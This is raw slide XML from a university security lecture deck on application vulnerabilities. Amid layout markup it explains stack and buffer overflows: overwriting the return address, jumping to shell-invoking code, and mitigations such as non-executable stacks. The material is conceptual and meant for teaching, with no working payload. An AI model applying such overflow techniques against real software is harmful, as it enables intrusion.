          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123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5C354A9F-5682-3446-838B-97965C79B6DB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>145</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9FD702A9-199E-8842-A6BA-D84903D3B018}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>146</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DF91307F-3418-3541-9126-02EFF585F244}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>147</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6D0BA-B202-3540-B9FB-0822A7C64046}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>149</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110899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899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A579D-E745-7D4E-82EC-FF06259005CF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>150</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111104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104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C7212-411B-5942-8FEE-692F89AA7222}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr 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92409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664D2-B5C1-A542-B9CF-3C5D91B08467}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>151</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111309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309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r>
              <a:rPr lang="en-US"/>
              <a:t>NOTE: ARGC AND ARGV SHOULD BE SWITCHED!</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14A5B-7643-634E-98BB-52F566DF0819}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>152</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111513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513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55C80E-0050-7440-91DD-7708E9697E53}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>153</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111718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718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00187-1A95-0C46-9504-1272CEE643CE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>154</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111923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92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14AD8-3053-A745-B0D6-C3FDBD417992}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>155</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11212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12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E6FB4-30E9-CF46-A0C7-F1C271B68F46}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>156</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11233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33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A6099-85F4-F94A-A0F1-153AA6D5F61A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>157</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11253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53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90CE1-BA8D-BA4B-80B6-E720D7771979}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>158</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11274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74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39116-6842-924A-A7CE-DDA575A70DA5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>159</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11294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94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ECC22-AED7-3646-BB4B-243DD2E9150E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>160</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9604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30536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5231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13355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125602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Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286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458200" y="4800600"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{FEE62F38-8D23-B74E-AB9B-1D546E6113A9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227214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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286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458200" y="4800600"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1E546586-0967-264B-9B68-19633807768E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="318521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Table Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1314450"/>
            <a:ext cx="8686800" cy="3486150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="4800600"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6533B83B-44E4-484B-85B6-9FCF77BE0DAA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310649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7538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40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 id="2147483658" r:id="rId7"/>
    <p:sldLayoutId id="2147483659" r:id="rId8"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3600" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="Roboto Light"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Roboto Light"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2200" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Roboto Light"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Roboto Light"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="–"/>
        <a:defRPr sz="1900" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Roboto Light"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Roboto Light"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="•"/>
        <a:defRPr sz="1600" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Roboto Light"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Roboto Light"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="–"/>
        <a:defRPr sz="1400" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Roboto Light"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Roboto Light"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="»"/>
        <a:defRPr sz="1200" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>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https://github.com/shellphish/how2heap"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artbleed.com/"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ghidra-sre.org/"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angr.io/"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Application Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Is It Safe?” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>-- Christian Szell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Giovanni Vigna</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UCSB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fall 2024</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35424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1458-5D97-44DF-5B9A-AC81530F551D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: JIRA Misconfiguration </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3828ABD9-6B26-5DBB-DDE5-0B7F9D7498A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1687956"/>
            <a:ext cx="8229600" cy="2778825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50161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dirty="0"/>
              <a:t>Overflows/Overwrites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The lack of boundary checking is one of the most common sources of memory corruption vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflows are one of the most popular type of attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture/OS version dependant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be exploited both locally and remotely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can modify both the data and the control flow of an application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1032586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dirty="0"/>
              <a:t>Overflows/Overwrites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recent tools have made the process of exploiting overflows easier if not completely automatic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Much research has been devoted to finding vulnerabilities, designing prevention techniques, and developing detection mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some of these mechanisms have found their way to mainstream operating system (non-executable stack, layout randomization)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7505556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42" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436243" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data is copied without checking boundaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data “overflows” a pre-allocated buffer and overwrites the return address (or other parts of the frame)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normally this causes a segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If correctly crafted, it is possible overwrite the return address with a user-defined value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible to cause a jump to user-defined code (e.g., code that invokes a shell)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code may be part of the overflowing data (or not)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code will be executed with the privileges of the running program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34055492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Stack Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="409575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Stack grows</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530436" name="Rectangle 4" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="3181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*str</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530437" name="Rectangle 5" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="34099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Return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530438" name="Rectangle 6" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="36385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Pointer to previous frame</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530439" name="Rectangle 7" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="38671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buffer  (16 bytes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530440" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="2952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1" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="2724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2" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="2495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3" name="Freeform 11"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2743200" y="3524250"/>
            <a:ext cx="381000" cy="4572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sz="1600">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530444" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="4152900"/>
            <a:ext cx="1588" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530445" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276601" y="2171701"/>
            <a:ext cx="2466954"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dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Top of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (FFFF)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530446" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276601" y="4686301"/>
            <a:ext cx="2817147"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a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Bottom of memory (0000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530447" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2803525" y="1300163"/>
            <a:ext cx="2322120"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dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>invocation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530448" name="Rectangle 16" descr="Wave"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="1638300"/>
            <a:ext cx="3429000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="wave">
            <a:fgClr>
              <a:schemeClr val="tx1"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1"/>
            </a:bgClr>
          </a:pattFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
